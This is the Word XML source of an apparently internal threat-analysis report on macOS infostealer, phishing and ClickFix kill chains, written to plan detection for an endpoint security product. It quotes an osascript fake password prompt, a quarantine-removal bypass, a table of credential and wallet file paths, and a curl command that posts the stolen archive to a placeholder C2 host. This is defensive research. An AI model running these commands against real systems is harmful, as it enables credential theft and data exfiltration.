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2A4A"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">AMOSKYS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="2E5090"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">The macOS Threat Landscape Bible</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="555555"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Kill Chains, Blind Spots &amp; Detection Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E5090" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Version 1.0  |  March 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Classification: Internal — Pre-Product Research</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This document is the foundational threat analysis for AMOSKYS positioning as a macOS-first endpoint security platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This document maps the precise technical mechanics of how attackers compromise macOS endpoints in 2023–2026. It goes beyond cataloging threats to dissect the exact kill chains, API calls, file paths, and system behaviors that make each attack possible. The purpose is to identify the specific instrumentation points where AMOSKYS must intercept to provide coverage that no existing tool delivers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The central finding is that macOS security blind spots are not bugs or oversights — they are structural consequences of Apple’s architectural decisions. The Endpoint Security Framework cannot see AppleScript content. Process trees are unreliable because XPC breaks parent attribution. The Unified Log is a firehose with no security structure. These are permanent constraints that every macOS security tool must work within, and most fail to adequately address.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AMOSKYS’s opportunity exists at the intersection of three structural gaps: (1) the absence of script content inspection on macOS, (2) zero security scanning for links delivered outside email, and (3) the inability to correlate cross-application attack chains from message receipt through credential exfiltration. No existing commercial or open-source tool adequately addresses all three.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 1: How Attackers Actually Attack macOS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This section maps the exact technical kill chains for the dominant macOS attack categories. Each kill chain documents the specific APIs called, files accessed, and system behaviors exploited at every stage.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.1 The Infostealer Kill Chain (AMOS / Poseidon / Banshee)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Infostealers are the dominant macOS threat, with AMOS (Atomic macOS Stealer) as the template. The kill chain has seven stages, each exploiting a specific macOS behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 1: Distribution via Malvertising</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Attackers purchase Google Ads for popular software (Arc Browser, Tor Browser, DeepSeek, Photoshop). The ad links to a convincing clone site hosting a .dmg file. The .dmg is delivered over HTTPS from legitimate hosting (Cloudflare Pages, Azure Blob Storage, Firebase Hosting). Distribution also occurs through trojanized Homebrew cask packages, cracked software on torrent sites, and since September 2025, through OpenClaw AI agent skills.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 2: DMG Mount and Gatekeeper Interaction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When the user double-clicks the .dmg, macOS mounts it as a virtual disk. The mounted volume contains an .app bundle. The .app carries the com.apple.quarantine extended attribute because it was downloaded from the internet. Pre-Sequoia (before September 2024), users could right-click and select Open to bypass Gatekeeper’s first-run check. This was the primary infection vector for 95% of stealer detections in 2024 according to Red Canary. Post-Sequoia, Apple removed the right-click bypass. Attackers adapted to ClickFix techniques: instructing users to drag the .app to Terminal or paste commands directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Alternative Gatekeeper bypasses include: xattr -d com.apple.quarantine to remove the quarantine flag entirely, extracting via command-line tools (unzip, tar) which do not propagate quarantine attributes, and the AppleDouble symlink trick where a hidden dot-prefixed file without quarantine is symlinked to the visible payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 3: The Fake Password Dialog (osascript)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the pivotal stage and the most important detection opportunity. Every major macOS stealer uses the same technique:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">osascript -e 'display dialog "macOS needs your password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  to continue" default answer "" with hidden answer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  buttons {"Continue"} default button 1 with icon caution'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The osascript binary invokes the AppleScript runtime. The display dialog command creates a native macOS modal window with a masked password input field. The dialog is visually indistinguishable from a legitimate macOS authentication prompt. When the user enters their password, the string is returned to the calling process’s stdout. The malware captures this and uses it immediately for privilege escalation via sudo -S (piped to stdin) and Keychain access via the security command-line tool.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical blind spot: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The Endpoint Security Framework fires ES_EVENT_TYPE_NOTIFY_EXEC when osascript launches, but the script content passed via -e is truncated or absent in the event data. There is no macOS equivalent to Windows AMSI that would allow inspection of the script before execution. The security tool sees that osascript ran, but not what it did.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 4: Credential and Data Harvesting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">With the user’s password captured, the stealer accesses the following paths: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3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File Path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Method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Keychain passwords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~/Library/Keychains/login.keychain-db</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security find-generic-password / find-internet-password with -wa flag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Chrome passwords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~/Library/Application Support/Google/Chrome/Default/Login Data</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SQLite database; decryption key from Keychain (Chrome Safe Storage)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Chrome cookies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~/Library/Application Support/Google/Chrome/Default/Cookies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SQLite database; session cookies enable MFA bypass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Safari history</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~/Library/Safari/History.db</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SQLite; requires TCC Full Disk Access or user consent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Firefox logins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~/Library/Application Support/Firefox/Profiles/*/logins.json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JSON + key4.db for decryption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SSH keys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~/.ssh/id_rsa, id_ed25519</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Direct file copy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Crypto wallets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~/Library/Application Support/Exodus/exodus/seed.seco</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Encrypted seed phrase; decryptable with master password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Desktop/Documents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~/Desktop/*, ~/Documents/*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Bulk file enumeration and copy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 5: Data Packaging and Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">All stolen data is compressed into a single ZIP archive using the macOS-native ditto command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">ditto -c -k --sequesterRsrc [source_directory] /tmp/out.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The archive is exfiltrated via HTTP POST using curl:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -X POST -H "BuildID: [unique_id]" -F "file=@/tmp/out.zip" http://[C2]/contact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The BuildID header uniquely identifies the infected machine. C2 servers are typically bulletproof hosting or compromised infrastructure. Communication uses standard HTTP/HTTPS on ports 80/443, making it indistinguishable from legitimate web traffic without behavioral analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 6: The Full Kill Chain in One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800"/>
        <w:gridCol w:w="216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macOS API/Behavior</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ES Framework Visibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Detection Possible?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DMG Download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NSURLSession / Safari download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ES_EVENT_TYPE_NOTIFY_CREATE (file)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 file creation with quarantine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DMG Mount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DiskArbitration framework</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ES_EVENT_TYPE_NOTIFY_MOUNT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 DMG mount event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Gatekeeper bypass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xattr -d com.apple.quarantine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ES_EVENT_TYPE_NOTIFY_DELETEEXTATTR</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 quarantine removal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osascript dialog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NSAppleScript / osascript -e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ES_EVENT_TYPE_NOTIFY_EXEC (truncated args)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Partial — process seen, content invisible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Keychain access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security CLI / SecItemCopyMatching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ES_EVENT_TYPE_NOTIFY_EXEC</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 security CLI with -wa flag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 Browser DB read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SQLite3 file read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ES_EVENT_TYPE_NOTIFY_OPEN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 sensitive path access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 Data compression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ditto -c -k</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ES_EVENT_TYPE_NOTIFY_EXEC</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 archive creation in /tmp</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 Exfiltration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curl POST to C2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ES_EVENT_TYPE_NOTIFY_SOCKET_CONNECT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 outbound connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.2 The Non-Email Phishing Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a malicious link arrives via email, it passes through SPF/DKIM/DMARC authentication, email gateway scanning (Proofpoint, Mimecast), URL rewriting with time-of-click verification (Microsoft Safe Links), web proxy inspection, and DNS filtering. When that identical link arrives via iMessage, WhatsApp, Teams, Slack, Discord, LinkedIn, or QR code, it passes through none of these defenses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Technical Path: iMessage Link to Credential Theft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a user taps a link in iMessage, the Messages app calls NSWorkspace.open(_:) which invokes Launch Services. Launch Services consults the URL scheme handler registry to determine the default browser. The URL is passed directly to Safari (or Chrome) with zero intermediate security scanning. No TCC permission is required for URL opening — this is by design. There is no hook point in the Launch Services pipeline where a third-party security tool can inspect the URL before it reaches the browser.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The browser loads the page. If it’s a credential phishing page hosted on legitimate infrastructure (Azure Blob Storage, Cloudflare Pages, Firebase), domain-based blocking is ineffective. The page presents a login form. The user enters credentials. The credentials are POST-ed to an attacker-controlled backend. At no point in this chain does any security control intervene unless the user has a browser extension performing URL reputation checking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If the page triggers a download instead of credential capture, the .dmg file receives the com.apple.quarantine attribute from the browser’s download manager. This is the single security control in the entire chain. Post-download, the attack transitions to the infostealer kill chain described above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why Cloud Sandboxing Cannot Close This Gap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The instinctive response is to route suspicious URLs through a cloud sandbox for analysis before allowing the user to access them. This approach fails against modern attacks for several structural reasons. Sandbox evasion is the 4th most common ATT&amp;CK technique according to the Picus Security Red Report 2026. Malware like Beep uses 17 distinct evasion techniques including sleep calls that delay execution for hours, anti-VM checks for mouse movement and screen resolution and CPU core count and fan presence, geofencing that serves benign content to security researcher IP ranges, and CAPTCHA-gated pages that require human interaction sandboxes cannot simulate. Deferred detonation attacks use URLs that are benign at delivery time and malicious hours later. Even Microsoft Safe Links only works within the Microsoft email ecosystem and adds 200–500ms latency per click.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Scale of the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1800"/>
        <w:gridCol w:w="256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Channel</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Security Scanning</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Click-Through Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Annual Losses (US)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Multi-layer (SPF/DKIM/DMARC + gateway + Safe Links + proxy + DNS)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Part of $12.5B BEC losses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SMS/iMessage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19–36%</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$470M (2024, 5x vs 2020)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Microsoft Teams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 inline for DMs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publicly measured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 orgs compromised by APT29 in Aug 2023</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Discord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 (CDN abused for malware hosting)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publicly measured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27+ malware families hosted on Discord CDN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QR codes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 (camera app has no URL scanner)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587% surge in 2023</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separately measured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LinkedIn DMs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Basic URL reputation only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publicly measured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vector for NK IT worker social engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3 The ClickFix / Paste-and-Run Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ClickFix attacks became the dominant macOS stealer delivery mechanism after Apple removed the right-click Gatekeeper bypass in macOS Sequoia (September 2024). The technique exploits human compliance rather than software vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Exact Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The user visits a compromised or phishing website (often arriving via non-email channel). The page displays a fake CAPTCHA, security verification, or error message. A button labeled Verify or Fix instructs the user to perform an action. The JavaScript on the page silently copies a malicious command to the system clipboard using navigator.clipboard.writeText(). The page then displays instructions: Open Terminal (Command+Space, type Terminal), then paste (Command+V) and press Enter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The pasted command typically takes one of these forms:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="720"/>
      </w:pPr>
